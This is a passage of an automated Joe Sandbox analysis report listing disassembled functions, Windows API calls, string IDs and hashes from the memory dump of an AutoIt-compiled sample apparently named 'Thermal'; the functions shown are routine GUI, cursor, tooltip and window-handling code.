                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: 3c855a49b143b52922688a8ca828c2b0e1df2d4eb72d2c0d3074e70b03182f3e
                                                • Instruction ID: 068eceda4e139ba0be278ec22319813f044f32e7f50658ccf04db38146e02f37
                                                • Opcode Fuzzy Hash: 3c855a49b143b52922688a8ca828c2b0e1df2d4eb72d2c0d3074e70b03182f3e
                                                • Instruction Fuzzy Hash: 286119B2900218BFDF519FA4DC49BAE7BB9FF08320F118115FA25AB2A1D7759940DF90
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F90EA
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F90FB
                                                • CharNextW.USER32(0000014E), ref: 007F912A
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F916B
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F9181
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F9192
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007F91AF
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F91FB
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007F9211
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F9242
                                                • _memset.LIBCMT ref: 007F9267
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007F92B0
                                                • _memset.LIBCMT ref: 007F930F
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F9339
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 007F9391
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 007F943E
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007F9460
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94AA
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F94D7
                                                • DrawMenuBar.USER32(?), ref: 007F94E6
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F950E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                • Opcode ID: 21fd06fcf30b8bccaa0bc434e3a151b7c40bcc391a6bc9976734850662319f51
                                                • Instruction ID: b9de3bba4fa48923ac7dc955c68711a4440d92c5b453433cb0f9e3d098c11be9
                                                • Opcode Fuzzy Hash: 21fd06fcf30b8bccaa0bc434e3a151b7c40bcc391a6bc9976734850662319f51
                                                • Instruction Fuzzy Hash: BCE15A7090020DAADB219F54CC88FFE7BB9FF05710F108156FB25AA291DB798A91DF61
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 007F5007
                                                • GetDesktopWindow.USER32 ref: 007F501C
                                                • GetWindowRect.USER32(00000000), ref: 007F5023
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F5085
                                                • DestroyWindow.USER32(?), ref: 007F50B1
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F50DA
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F50F8
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007F511E
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 007F5133
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007F5146
                                                • IsWindowVisible.USER32(?), ref: 007F5166
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007F5181
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007F5195
                                                • GetWindowRect.USER32(?,?), ref: 007F51AD
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 007F51D3
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 007F51ED
                                                • CopyRect.USER32(?,?), ref: 007F5204
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 007F526F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
                                                • Instruction ID: ae4903aeca466d14be7b750bbfa4767647a2608b341c6fbd59a8d1339862a98a
                                                • Opcode Fuzzy Hash: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
                                                • Instruction Fuzzy Hash: D7B16A71604744AFDB44DF64C849B6ABBE5FF88310F008A1CF6999B291DB75EC05CB92
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007D499C
                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007D49C2
                                                • _wcscpy.LIBCMT ref: 007D49F0
                                                • _wcscmp.LIBCMT ref: 007D49FB
                                                • _wcscat.LIBCMT ref: 007D4A11
                                                • _wcsstr.LIBCMT ref: 007D4A1C
                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007D4A38
                                                • _wcscat.LIBCMT ref: 007D4A81
                                                • _wcscat.LIBCMT ref: 007D4A88
                                                • _wcsncpy.LIBCMT ref: 007D4AB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 699586101-1459072770
                                                • Opcode ID: 8d51871c5e103420d5a636a6d2f1e8cb80329425e7c2de1ef47622ddf8e4130c
                                                • Instruction ID: 681c75ecb3f1c49e2e9afba99724d5e57a7f5741ff28ba11de3903ff5608d24e
                                                • Opcode Fuzzy Hash: 8d51871c5e103420d5a636a6d2f1e8cb80329425e7c2de1ef47622ddf8e4130c
                                                • Instruction Fuzzy Hash: DC41E172600215FBEF10B764EC4AEBF777CEF41710F00405AF918E6292EB7D9A0296A5
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772C8C
                                                • GetSystemMetrics.USER32(00000007), ref: 00772C94
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772CBF
                                                • GetSystemMetrics.USER32(00000008), ref: 00772CC7
                                                • GetSystemMetrics.USER32(00000004), ref: 00772CEC
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00772D09
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00772D19
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00772D4C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00772D60
                                                • GetClientRect.USER32(00000000,000000FF), ref: 00772D7E
                                                • GetStockObject.GDI32(00000011), ref: 00772D9A
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00772DA5
                                                  • Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
                                                  • Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                • SetTimer.USER32(00000000,00000000,00000028,007713C7), ref: 00772DCC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 4f91ebc2ea92fd53adcd6533de50e3b9583f42dd47f0e44015812f28244b3572
                                                • Instruction ID: 4e046da53a99827d67d8c7f9dd942bdd7fc8de36a49d2315b0e96daa4e94d638
                                                • Opcode Fuzzy Hash: 4f91ebc2ea92fd53adcd6533de50e3b9583f42dd47f0e44015812f28244b3572
                                                • Instruction Fuzzy Hash: A3B17E7160020AEFDF15DFA8CC59BAD7BA4FB48350F108629FA19A7290DB78E841CF54
                                                APIs
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • GetForegroundWindow.USER32(00800980,?,?,?,?,?), ref: 007904E3
                                                • IsWindow.USER32(?), ref: 007C66BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Foreground_memmove
                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                • API String ID: 3828923867-1919597938
                                                • Opcode ID: ec7d7eaf220005177e2776d5dca15ff1559e36d36f976d88c6b8079fd0afb3e6
                                                • Instruction ID: 5fd78dc8f32545ef0dae35a1d24f750954a3e082e3052813a16e23273b0b6de4
                                                • Opcode Fuzzy Hash: ec7d7eaf220005177e2776d5dca15ff1559e36d36f976d88c6b8079fd0afb3e6
                                                • Instruction Fuzzy Hash: 6AD1A570104202DFCB08EF60D885EAABBB5FF54344F504A1DF495975A2DB38E999CB92
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007F44AC
                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007F456C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                • API String ID: 3974292440-719923060
                                                • Opcode ID: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
                                                • Instruction ID: aa74f8a79a00e0c7d2df8a7125ca77286b3af2ec988cb49538cafcbe6c5dfb53
                                                • Opcode Fuzzy Hash: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
                                                • Instruction Fuzzy Hash: 00A16C30214215DFCB14EF60C855A7AB3A5FF85354F10896CFA969B392DB38EC49CB91
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 007E56E1
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 007E56EC
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 007E56F7
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 007E5702
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 007E570D
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 007E5718
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 007E5723
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 007E572E
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 007E5739
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 007E5744
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 007E574F
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 007E575A
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 007E5765
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 007E5770
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007E577B
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007E5786
                                                • GetCursorInfo.USER32(?), ref: 007E5796
                                                • GetLastError.KERNEL32(00000001,00000000), ref: 007E57C1
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$ErrorInfoLast
                                                • String ID:
                                                • API String ID: 3215588206-0
                                                • Opcode ID: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
                                                • Instruction ID: 23ef72e37f68feba2323e8bd7b82903b82013540eb6bfdf02b31e495c2988dfd
                                                • Opcode Fuzzy Hash: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
                                                • Instruction Fuzzy Hash: 80415370E04319AADB109FB68C49D6EFEF8EF55B54B10452FE509E7290DAB8A400CF91
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CB17B
                                                • __swprintf.LIBCMT ref: 007CB21C
                                                • _wcscmp.LIBCMT ref: 007CB22F
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007CB284
                                                • _wcscmp.LIBCMT ref: 007CB2C0
                                                • GetClassNameW.USER32(?,?,00000400), ref: 007CB2F7
                                                • GetDlgCtrlID.USER32(?), ref: 007CB349
                                                • GetWindowRect.USER32(?,?), ref: 007CB37F
                                                • GetParent.USER32(?), ref: 007CB39D
                                                • ScreenToClient.USER32(00000000), ref: 007CB3A4
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CB41E
                                                • _wcscmp.LIBCMT ref: 007CB432
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 007CB458
                                                • _wcscmp.LIBCMT ref: 007CB46C
                                                  • Part of subcall function 0079385C: _iswctype.LIBCMT ref: 00793864
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                • String ID: %s%u
                                                • API String ID: 3744389584-679674701
                                                • Opcode ID: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
                                                • Instruction ID: 3b62c603966ae03cb115a87d787289cf65f64671039a85cb070b4219c21b275d
                                                • Opcode Fuzzy Hash: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
                                                • Instruction Fuzzy Hash: FFA1E171204346EBDB18DF60C886FAAB7E8FF44350F10461DF999C2191DB38EA55CBA1
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 007CBAB1
                                                • _wcscmp.LIBCMT ref: 007CBAC2
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 007CBAEA
                                                • CharUpperBuffW.USER32(?,00000000), ref: 007CBB07
                                                • _wcscmp.LIBCMT ref: 007CBB25
                                                • _wcsstr.LIBCMT ref: 007CBB36
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CBB6E
                                                • _wcscmp.LIBCMT ref: 007CBB7E
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 007CBBA5
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CBBEE
                                                • _wcscmp.LIBCMT ref: 007CBBFE
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 007CBC26
                                                • GetWindowRect.USER32(00000004,?), ref: 007CBC8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                • Opcode ID: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
                                                • Instruction ID: 5eb2a3589362b678dffd100a8fe12f9052d4084c1d760c7ed0950a407dd79ff3
                                                • Opcode Fuzzy Hash: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
                                                • Instruction Fuzzy Hash: 8C819E710043099BDB14DF64D886FAA77E8FF44314F04856DFD8A9A096DB38ED4ACB61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: 898d6127db741256aea2c926b4ab7a6f8ba877ca1e7e5a2c521d95211891feda
                                                • Instruction ID: a13a08e4becea7eca87676cbbb977e2c690bd3c01da6e4b04b0cfe91e2f6d423
                                                • Opcode Fuzzy Hash: 898d6127db741256aea2c926b4ab7a6f8ba877ca1e7e5a2c521d95211891feda
                                                • Instruction Fuzzy Hash: C131C230684215EBCB08FA50ED47FAD73A8AF20750FA0012DF551B11D1EF6DBE048656
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 007CCBAA
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007CCBBC
                                                • SetWindowTextW.USER32(?,?), ref: 007CCBD3
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CCBE8
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CCBEE
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CCBFE
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CCC04
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007CCC25
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007CCC3F
                                                • GetWindowRect.USER32(?,?), ref: 007CCC48
                                                • SetWindowTextW.USER32(?,?), ref: 007CCCB3
                                                • GetDesktopWindow.USER32 ref: 007CCCB9
                                                • GetWindowRect.USER32(00000000), ref: 007CCCC0
                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007CCD0C
                                                • GetClientRect.USER32(?,?), ref: 007CCD19
                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007CCD3E
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007CCD69
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
                                                • Instruction ID: a8d2d431c5770a436a186426f4d03463ac7f049f9bac59df5078a84a76ee4508
                                                • Opcode Fuzzy Hash: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
                                                • Instruction Fuzzy Hash: F8515D70900709EFDB219FA8CE8AF6EBBB5FF44705F00491CE55AA25A0DB79A914CF50
                                                APIs
                                                • _memset.LIBCMT ref: 007FA87E
                                                • DestroyWindow.USER32(00000000,?), ref: 007FA8F8
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007FA972
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007FA994
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA9A7
                                                • DestroyWindow.USER32(00000000), ref: 007FA9C9
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007FAA00
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FAA19
                                                • GetDesktopWindow.USER32 ref: 007FAA32
                                                • GetWindowRect.USER32(00000000), ref: 007FAA39
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007FAA51
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007FAA69
                                                  • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 1297703922-3619404913
                                                • Opcode ID: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
                                                • Instruction ID: b3972d50ff303b140d1e54c5a74cc89cd2a8c22c3c324524e8a9903451be0838
                                                • Opcode Fuzzy Hash: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
                                                • Instruction Fuzzy Hash: 5C7189B1150208AFD721CF28C849F7A77E9FB88300F04492DFA89973A1D779E916DB56
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DragQueryPoint.SHELL32(?,?), ref: 007FCCCF
                                                  • Part of subcall function 007FB1A9: ClientToScreen.USER32(?,?), ref: 007FB1D2
                                                  • Part of subcall function 007FB1A9: GetWindowRect.USER32(?,?), ref: 007FB248
